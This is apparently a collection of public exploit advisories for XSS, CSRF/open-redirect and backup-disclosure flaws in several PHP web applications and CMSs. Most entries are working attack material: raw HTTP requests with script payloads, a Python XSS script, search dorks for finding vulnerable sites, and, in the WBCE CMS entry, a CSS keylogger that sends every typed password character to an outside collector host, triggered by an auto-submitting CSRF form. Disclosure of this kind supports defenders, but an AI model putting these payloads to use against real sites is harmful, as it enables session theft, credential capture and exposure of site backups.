<pre><code>Exploit Title: Rukovoditel 3.4.1 - Multiple Stored XSS<br />Version: 3.4.1<br />Bugs: Multiple Stored XSS<br />Technology: PHP<br />Vendor URL: https://www.rukovoditel.net/<br />Software Link: https://www.rukovoditel.net/download.php<br />Date of found: 24-06-2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux <br /><br /><br />2. Technical Details & POC<br />========================================<br /> ###XSS-1###<br />========================================<br />steps:<br />1. login to account<br />2. create project (http://localhost/index.php?module=items/items&path=21)<br />3. add task <br />4. open task <br />5. add comment as "<iframe src="https://14.rs"></iframe> "<br /><br /><br />POST /index.php?module=items/comments&action=save&token=FEOZ9jeKuA HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 241<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/index.php?module=items/info&path=21-2/22-1&redirect_to=subentity&gotopage[74]=1<br />Cookie: cookie_test=please_accept_for_session; sid=vftrl4mhmbvdbrvfmb0rb54vo5<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />form_session_token=FEOZ9jeKuA&path=21-2%2F22-1&fields%5B169%5D=47&fields%5B170%5D=53&fields%5B174%5D=3&description=%3Ciframe+src%3D%22https%3A%2F%2F14.rs%22%3E%3C%2Fiframe%3E+&uploadifive_attachments_upload_attachments=&comments_attachments=<br /><br />===========================<br /> ###XSS-2###<br />===========================<br />1.go to admin account<br />2.go to configration => applicaton<br />3.Copyright Text set as "<img src=x onerror=alert(1)>"<br /><br /><br />POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------12298384558648010343132232769<br />Content-Length: 2766<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/index.php?module=configuration/application<br />Cookie: cookie_test=please_accept_for_session; sid=vftrl4mhmbvdbrvfmb0rb54vo5<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="form_session_token"<br /><br />ju271AAoy1<br />-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="CFG[APP_NAME]"<br /><br />Rukovoditel<br />-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="CFG[APP_SHORT_NAME_MOBILE]"<br /><br />ffgsdfgsdfg<br />-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="CFG[APP_SHORT_NAME]"<br /><br />ruko<br />-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="APP_LOGO"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="CFG[APP_LOGO]"<br /><br /><br />-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="CFG[APP_LOGO_URL]"<br /><br /><br />-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="APP_FAVICON"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="CFG[APP_FAVICON]"<br /><br /><br />-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="CFG[APP_COPYRIGHT_NAME]"<br /><br /><img src=x onerror=alert(1)><br />-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="CFG[APP_LANGUAGE]"<br /><br />english.php<br />-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="CFG[APP_SKIN]"<br /><br /><br />-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="CFG[APP_TIMEZONE]"<br /><br />America/New_York<br />-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="CFG[APP_ROWS_PER_PAGE]"<br /><br />10<br />-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="CFG[APP_DATE_FORMAT]"<br /><br />m/d/Y<br />-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="CFG[APP_DATETIME_FORMAT]"<br /><br />m/d/Y H:i<br />-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="CFG[APP_NUMBER_FORMAT]"<br /><br />2/./*<br />-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="CFG[APP_FIRST_DAY_OF_WEEK]"<br /><br />0<br />-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="CFG[DROP_DOWN_MENU_ON_HOVER]"<br /><br />0<br />-----------------------------12298384558648010343132232769<br />Content-Disposition: form-data; name="CFG[DISABLE_CHECK_FOR_UPDATES]"<br /><br />0<br />-----------------------------12298384558648010343132232769--<br /><br /></code></pre>
<pre><code># Exploit Title: Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)<br /># Date: 2023-06-23<br /># country: Iran<br /># Exploit Author: Amirhossein Bahramizadeh<br /># Category : webapps<br /># Dork : /print.php?nm_member=<br /># Vendor Homepage: https://www.codekop.com/products/source-code-aplikasi-pos-penjualan-barang-kasir-dengan-php-mysql-3.html<br /># Tested on: Windows/Linux<br /># CVE : CVE-2023-36346<br /><br />import requests<br />import urllib.parse<br /><br /># Set the target URL and payload<br />url = "http://example.com/print.php"<br />payload = "<script>alert('XSS')</script>"<br /><br /># Encode the payload for URL inclusion<br />payload = urllib.parse.quote(payload)<br /><br /># Build the request parameters<br />params = {<br /> "nm_member": payload<br />}<br /><br /># Send the request and print the response<br />response = requests.get(url, params=params)<br />print(response.text)<br /> <br /><br /></code></pre>
<pre><code>Exploit Title: WBCE CMS 1.6.1 - Open Redirect & CSRF<br />Version: 1.6.1<br />Bugs: Open Redirect + CSRF = CSS KEYLOGGING<br />Technology: PHP<br />Vendor URL: https://wbce-cms.org/<br />Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1<br />Date of found: 03-07-2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux <br /><br /><br />2. Technical Details & POC<br />========================================<br /><br />1. Login to Account<br />2. Go to Media (http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/index.php#elf_l1_Lw)<br />3. Then you upload html file .(html file content is as below)<br /><br />'''<br /><html><br /> <head><br /> <title><br /> Login<br /> </title><br /> <style><br /> input[type="password"][value*="q"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/q');}<br /> input[type="password"][value*="w"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/w');}<br /> input[type="password"][value*="e"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/e');}<br /> input[type="password"][value*="r"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/r');}<br /> input[type="password"][value*="t"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/t');}<br /> input[type="password"][value*="y"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/y');}<br /> input[type="password"][value*="u"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/u');}<br /> input[type="password"][value*="i"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/i');}<br /> input[type="password"][value*="o"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/o');}<br /> input[type="password"][value*="p"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/p');}<br /> input[type="password"][value*="a"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/a');}<br /> input[type="password"][value*="s"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/s');}<br /> input[type="password"][value*="d"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/d');}<br /> input[type="password"][value*="f"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/f');}<br /> input[type="password"][value*="g"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/g');}<br /> input[type="password"][value*="h"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/h');}<br /> input[type="password"][value*="j"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/j');}<br /> input[type="password"][value*="k"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/k');}<br /> input[type="password"][value*="l"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/l');}<br /> input[type="password"][value*="z"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/z');}<br /> input[type="password"][value*="x"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/x');}<br /> input[type="password"][value*="c"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/c');}<br /> input[type="password"][value*="v"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/v');}<br /> input[type="password"][value*="b"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/b');}<br /> input[type="password"][value*="n"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/n');}<br /> input[type="password"][value*="m"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/m');}<br /> input[type="password"][value*="Q"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/Q');}<br /> input[type="password"][value*="W"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/W');}<br /> input[type="password"][value*="E"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/E');}<br /> input[type="password"][value*="R"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/R');}<br /> input[type="password"][value*="T"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/T');}<br /> input[type="password"][value*="Y"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/Y');}<br /> input[type="password"][value*="U"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/U');}<br /> input[type="password"][value*="I"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/I');}<br /> input[type="password"][value*="O"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/O');}<br /> input[type="password"][value*="P"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/P');}<br /> input[type="password"][value*="A"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/A');}<br /> input[type="password"][value*="S"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/S');}<br /> input[type="password"][value*="D"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/D');}<br /> input[type="password"][value*="F"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/F');}<br /> input[type="password"][value*="G"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/G');}<br /> input[type="password"][value*="H"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/H');}<br /> input[type="password"][value*="J"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/J');}<br /> input[type="password"][value*="K"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/K');}<br /> input[type="password"][value*="L"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/L');}<br /> input[type="password"][value*="Z"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/Z');}<br /> input[type="password"][value*="X"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/X');}<br /> input[type="password"][value*="C"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/C');}<br /> input[type="password"][value*="V"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/V');}<br /> input[type="password"][value*="B"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/B');}<br /> input[type="password"][value*="N"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/N');}<br /> input[type="password"][value*="M"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/M');}<br /> input[type="password"][value*="1"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/1');}<br /> input[type="password"][value*="2"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/2');}<br /> input[type="password"][value*="3"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/3');}<br /> input[type="password"][value*="4"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/4');}<br /> input[type="password"][value*="5"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/5');}<br /> input[type="password"][value*="6"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/6');}<br /> input[type="password"][value*="7"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/7');}<br /> input[type="password"][value*="8"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/8');}<br /> input[type="password"][value*="9"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/9');}<br /> input[type="password"][value*="0"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/0');}<br /> input[type="password"][value*="-"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/-');}<br /> input[type="password"][value*="."]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/.');}<br /> input[type="password"][value*="_"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/%60');}<br /> input[type="password"][value*="@"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/%40');}<br /> input[type="password"][value*="?"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/%3F');}<br /> input[type="password"][value*=">"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/%3E');}<br /> input[type="password"][value*="<"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/%3C');}<br /> input[type="password"][value*="="]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/%3D');}<br /> input[type="password"][value*=":"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/%3A');}<br /> input[type="password"][value*=";"]{<br /> background-image: url('https://enflownwx6she.x.pipedream.net/%3B');}<br /> </style><br /> </head><br /><body><br /> <label>Please enter username and password</label><br /> <br><br><br /> Password:: <input type="password" /><br /> <script><br /> document.querySelector('input').addEventListener('keyup', (evt)=>{<br /> evt.target.setAttribute('value', evt.target.value);<br /> })<br /> </script><br /></body><br /></html><br />'''<br /><br />4.Then go to url of html file (http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html) and copy url.<br />5.Then you logout account and go to again login page (http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php)<br /><br /><br />POST /WBCE_CMS-1.6.1/wbce/admin/login/index.php HTTP/1.1<br />Host: localhost<br />Content-Length: 160<br />Cache-Control: max-age=0<br />sec-ch-ua: <br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: ""<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: phpsessid-2729-sid=3i7oqonhjf0ug0jl5dfdp4uugg<br />Connection: close<br /><br />url=&username_fieldname=username_3584B221EC89&password_fieldname=password_3584B221EC89&username_3584B221EC89=test&password_3584B221EC89=Hello123%21&submit=Login<br /> <br />6.If write as (https://ATTACKER.com) in url parameter on abowe request on you redirect to attacker.com.<br />7.We write to html files url<br /><br />url=http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html<br /><br />8.And create csrf-poc with csrf.poc.generator<br /><br /><html><br /> <title><br /> This CSRF was found by miri<br /> </title><br /> <body><br /> <h1><br /> CSRF POC<br /> </h1><br /> <form action="http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php" method="POST" enctype="application/x-www-form-urlencoded"><br /> <input type="hidden" name="url" value="http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html" /><br /> </form><br /> <script>document.forms[0].submit();</script><br /> </body><br /></html><br /><br /><br />9.If victim click , ht redirect to html file and this page send to my server all keyboard activity of victim.<br /><br /><br />Poc video : https://youtu.be/m-x_rYXTP9E<br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : WordPress - Duplicator 3.8.8 Backup Disclosure Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0.2(64-bit) | <br />| # Vendor : https://snapcreek.com/duplicator/docs/changelog/ | <br />| # Dork : "/wp-content/backups-dup-pro/" |<br />====================================================================================================================================<br /><br />P0C :<br /><br />[+] Appears to leave backups in a world accessible directory under the document root & The plugin exports a backup exported as a text file and contains sensitive informations.<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : "/wp-content/backups-dup-pro/"<br /><br />[+] https://127.0.0.1/blessedbeyondadoubtcom/wp-content/backups-dup-pro/<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg |<br />=======================================================================================================================================<br /></code></pre>
<pre><code># Exploit Title: Alkacon OpenCMS 15.0 - Multiple Cross-Site Scripting<br /># Date: 1/07/2023<br /># Exploit Author: tmrswrr<br /># Vendor Homepage: http://www.opencms.org<br /># Software Link: https://github.com/alkacon/opencms-core<br /># Version: v15.0<br /><br /><br />POC:<br /><br />1 ) Login in demo page , go to this url<br />https://demo.opencms.org/workplace#!explorer/8b72b2fe-180f-11ee-b326-0242ac11002b!!/sites/livedemo!!/.galleries/livedemo/!!<br />2 ) Click /.galleries/ , after right click any png file , open gallery, write in search button this payload<br /><img src=. onerror=alert(document.domain)><br />3 ) You will be see alert box<br /><br />POC:<br /><br />1 ) Go to this url , right click any png file, rename title section and write your payload : <img src=. onerror=alert(document.domain)><br />https://demo.opencms.org/workplace#!explorer/8b72b2fe-180f-11ee-b326-0242ac11002b!!/sites/livedemo!!/230701/ld_go87op3bfy/.galleries/images/!!<br />2 ) You will be see alert box , stored xss <br /><br />POC:<br /><br />1 ) Go to this url , right click any png file and choose replace , click change file and choose your svg file<br />after save it <br /><br />svg file:<br /><br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><br /> <script type="text/javascript"><br /> alert("XSS");<br /> </script><br /></svg><br /><br />2 ) When click this svg file you will be see alert button<br /><br /><br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://www.inoutscripts.com/products/inout-search-engine-ai-edition/ │<br />│ Vendor : Inout Scripts │<br />│ Software : Inout Search Engine AI Edition 1.1 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br /><br />Path: /index.php<br /><br />GET 'page' parameter is vulnerable to RXSS<br /><br />https://website/index.php?page=index%2findexl7fex%3cimg%20src%3da%20onerror%3dalert(1)%3ed392j&type=Web<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://gzscripts.com/vacation-rental-website.html │<br />│ Vendor : GZ Scripts │<br />│ Software : Vacation Rental 1.8 │<br />│ Vuln Type: Stored XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ Allow Attacker to inject malicious code into website, give ability to steal sensitive │<br />│ information, manipulate data, and launch additional attacks. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />## Stored XSS<br /><br />------------------------------------------------------------<br />POST /VacationRentalWebsite/property/8/ad-has-principes/ HTTP/1.1<br /><br />property_id=8&action=detail&send_review=1&cleanliness=0%3B4.2&comfort=0%3B4.2&location=0%3B4.2&service=0%3B4.2&sleep=0%3B4.2&price=0%3B4.2&username=[XSS Payload]&evaluation=3&title=[XSS Payload]&comment=[XSS Payload]&captcha=lbhkyj<br />------------------------------------------------------------<br /><br />POST parameter 'username' is vulnerable to XSS<br />POST parameter 'title' is vulnerable to XSS<br />POST parameter 'comment' is vulnerable to XSS<br /><br /><br /><br />## Steps to Reproduce:<br /><br />1. Surf (as Guest) - Go to any Listed Property<br />2. Go to [Customer Reviews] on this Path (http://website/property/[Number1-9]/[name-of-Property]/#customerReviews)<br />3. Inject your [XSS Payload] in "Username"<br />4. Inject your [XSS Payload] in "Title"<br />5. Inject your [XSS Payload] in "Comment"<br />6. Submit<br /><br />7. XSS Fired on Local Browser<br /><br />8. XSS will Fire & Execute on Visitor's Browser when they visit the page of Property you [Inject] the XSS Payloads in & XSS will Fire also on the [Reviews Page]<br /><br /><br />Note: I think Administration Panel missing a section to Manage [Reviews] on the website<br /> this feature must be added in next Updates [View/Edit/Delete]<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Strawberry 1.1.9 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit) | <br />| # Vendor : https://cutenewsru.sourceforge.io/strawberry/ | <br />| # Dork : "Powered by Strawberry 1.1.9" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : /content/index.php/"onmouseover%3d'prompt(document.cookies)'bad%3d"<br /><br />[+] http://127.0.0.1/dverekomondoorcom/content/index.php/"onmouseover%3d'prompt(document.cookies)'bad%3d"<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : sisfo Sistem Informasi Akademik lms v1.9.3 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit) | <br />| # Vendor : http://unisma.ac.id/ | <br />| # Dork : inurl:mnux?=login |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : /?lgn=frm&lid=50&mnux=login&nme=Kepala%2520Akademik'"()%26%25<acx><ScRiPt >prompt(/indoushka/)</ScRiPt><br /><br />[+] https://127.0.0.1/siakad.stpi-pajak.ac.id/?lgn=frm&lid=50&mnux=login&nme=Kepala%2520Akademik%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/indoushka/)%3C/ScRiPt%3E<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Rest-Cafe and Restaurant Website CMS 2.0.0 ْXSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 67.0.1(64-bit) | <br />| # Vendor : https://codecanyon.net/item/rest-cafe-and-restaurant-website-cms/21630154 | <br />| # Dork : "news.php?slug=" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : /news.php?slug=at-his-ludus-nonumes-gloriatur-ne-vim-tamquam%27%22()%26%25%3Cacx%3E%3CScRiPt%3Eprompt(005605414920)%3C/ScRiPt%3E<br /><br />[+] http://127.0.0.1/cms/news.php?slug=at-his-ludus-nonumes-gloriatur-ne-vim-tamquam%27%22()%26%25%3Cacx%3E%3CScRiPt%3Eprompt(005605414920)%3C/ScRiPt%3E<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>